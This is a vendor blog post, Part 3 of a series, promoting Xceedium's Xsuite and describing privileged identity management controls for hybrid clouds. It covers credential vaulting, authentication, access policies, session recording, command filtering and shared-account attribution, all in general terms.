Part 3: Privileged Identity Management Controls for the Hybrid Cloud
So far, we’ve discussed some of the overall market trends driving migration to the hybrid cloud, and what the migration implies for privileged identity management systems. Today, we’ll talk about specific features and capabilities we believe are essential to the task.
Xceedium was the first privileged identity management vendor to deliver a comprehensive, integrated solution that spans the whole of the hybrid cloud. In working with customers, we’ve identified several privileged identity management capabilities essential to success. Xsuite, Xceedium’s hybrid cloud privileged identity management solution, delivers all these controls and more.
“…With virtualization, privileged account management and maintaining separation of duties in that environment is a pretty complex problem. If you get privileged access at the hypervisor level you can do a whole lot more damage than just getting access to a single application” – Lori Rowland, Gartner Managing VP
Vault and Manage Credentials and Passwords
Given that they represent the proverbial “keys to the kingdom” and considering the value of the assets they protect, the way most organizations protect and manage privileged credentials is shocking. Typically stored in spreadsheets or flat files and shared indiscriminately, these resources are—for all intents and purposes—essentially unprotected in most organizations.
So the first step in establishing control over privileged identity management is to capture, vault, and manage these privileged credentials. This protects credentials from disclosure within a secure, encrypted vault. (Xsuite provides its own secure storage facility, and offers an integrated SafeNet HSM option for high assurance security requirements.) In addition to administrative credentials, it’s a requirement the application-to-application passwords in use be managed. These passwords, used to access databases and other systems, are typically hard-coded into applications and scripts, posing a serious risk of loss or disclosure.
Xsuite manages passwords—creating and maintaining passwords, establishing and enforcing password complexity and change requirements, and providing direct and indirect access to privileged users through direct interaction with target systems. Unlike other systems that implement only check out features that rely on users cutting and pasting passwords for access to systems, passwords and other credentials managed by Xsuite are passed directly to target systems. This means critical credentials are never exposed to end-users users or their end nodes that may contain viruses or malware that can result in theft, loss, or corruption. This eliminates inadvertent disclosure to rogue users or malware.
Positive User Authentication
When working with such sensitive resources, positive user authentication is an essential requirement. That’s true not just for reasons of security—auditors increasingly want to know exactly who’s conducted a privileged transaction, even when administrators use shared privileged accounts like root. Xsuite is able to leverage existing identity stores—such as Active Directory—and protocols like RADIUS—to positively identify individuals and ascertain group memberships and role definitions. As an adjunct, Xsuite is tightly integrated with several multi-factor authentication technologies, including SafeNet smartcards and SecureID hardware tokens.
Control Visibility and Access
In many networks, authentication is functionally equivalent to access control. Once on the network, an individual gains visibility to resources across the network. Even if they don’t have direct authorization to access a specific system, users can leverage this visibility to simplify their efforts to gain entry to have value targets. In most cases, given existing credential storage techniques, the task simply isn’t that hard. It’s clear this approach delivers inadequate levels of control.
This weakness is overcome by expressly separating authentication and access control. Authentication serves simply to identify an individual user. Access to specific systems should be controlled based on established organizational policies.
With Xsuite, authentication merely confirms an individual’s identity. Access to resources is managed by a completely different part of the system, controlled by specific, explicit policies. Once authenticated, users are presented with a list of only those servers and network resources they are explicitly authorized to access. Xsuite also controls what methods can be used to access target systems (such as SSH, RDP, web applications, and the like.) Privileged users simply never see resources they’re not authorized to access.
Monitor Sessions and Control Command Execution
Given the risks associated with privileged users, activity should be monitored continuously. Users should only be allowed to execute authorized commands. Ideally, control should be extended to the execution of individual arguments and parameters of commands. Unauthorized commands should be proactively rejected, and prevented from executing.
Xsuite monitors sessions through a combination of policy-based “white” and “black” command lists. White listed commands are allowed, subject to the constraints defined within a session policy. Black listed commands are discarded. Each session is proactively monitored and all activity is logged.
If a user attempts to execute an unauthorized command, multiple responses are available. At the most basic level, the command is blocked, the violation is logged, and the user is warned of the policy violation. It’s also possible to generate alerts for dispatch to the Security Operations Center or monitoring team. For particularly egregious violations, a session can be terminated. Optionally, an offending user’s account can be temporarily suspended, preventing reuse until the incident is investigated and resolved satisfactorily.
A picture, it’s said, is worth 1,000 words. And that’s true when it comes to supervising privileged user activity. Xsuite records full user sessions across RDP, SSH, and web/browser-based applications. Session recordings—optimized for economical storage use—are viewed using a DVR-like playback interface. Recordings can be stopped, started, rewound, fast-forwarded, and more. That simplifies the task of reviewing individual sessions. Attempted policy violations are captured and integrated with the recording. A reviewer can simply jump ahead to the next recorded policy violation to speed evaluation and resolution efforts.
Prevent Leapfrogging and Contain Access
A common attack vector leverages access to relatively inconsequential systems as a pathway to more interesting and rewarding devices. Attackers begin with lightly defended systems, taking control and leveraging access to attack the next step in the chain. Exploiting these attack paths requires visibility to the entire network in order to identify and attack the next waypoint on the path to the ultimate reward.
Xsuite prevents this activity by controlling visibility into the network. Privileged users see only those systems to which policies provide access. Given Xsuite’s powerful password vaulting and protection capabilities, if a rogue user did manage to gain access to an unauthorized system (perhaps by walking up to it in the data center), it would still be extremely difficult to gain access. Privileged passwords and credentials are protected in the secure, encrypted credential safe.
Additional protections against leapfrogging are provided by command filtering capabilities on target systems. Individual commands are intercepted and examined for compliance with policies. Unauthorized commands are proactively rejected—accompanied by security alerts, logs, warnings, and even session termination. So, even if an individual somehow gains visibility to a given system, access attempts can be thwarted.
Shared Account Identity Attribution
By their nature, shared administrative accounts—like root—are anonymous. That poses a risk—but it’s one often accepted, since shared accounts can be used to ease setup and ongoing management burden across a large number of servers. The risk arises since, when multiple individuals make use of the accounts, it’s difficult—impossible in many cases—to determine precisely who actually issued a command. Investigations into incidents—as well as demonstrating compliance with regulatory standards—are stymied because the system can’t conclusively document which individual issued a problematic command.
Even though a user may be logged into a shared account—“root” or “admin” for example—Xsuite knows with precision which user is logged in and using the account, and exactly what he or she is doing (no anonymous activity is permitted). Organizations get the benefit of simplified system configuration and management without the issue of explaining to an auditor why they don’t know “who was root” at 2pm on Tuesday.
In this post, we’ve described the high level list of functional capabilities required to effectively deliver privileged identity management. As noted earlier, we believe privileged identity management in the hybrid cloud will require solutions spanning all these functional capabilities, across key technology infrastructures like the data center, virtualized servers, and the cloud. Xsuite is the first and only privileged identity management solution that delivers the full set of functionality needed for effective management of privileged users, across the entire hybrid cloud. And only Xsuite is available in multiple appliance form factors – a purpose built, and hardened hardware appliance, an Open Virtualization Format (OVF) appliance for VMware vSphere and an Amazon Machine Image (AMI) that runs on Amazon Web Services EC2 infrastructure.
Previous posts talked about adoption of the hybrid cloud, and implications for privileged identity management. And Part 2 examined what specific changes are needed in privileged identity management technology. Tomorrow, in a bonus Part 4, we’ll provide some specific questions to ask vendors as a way to begin evaluating different solutions.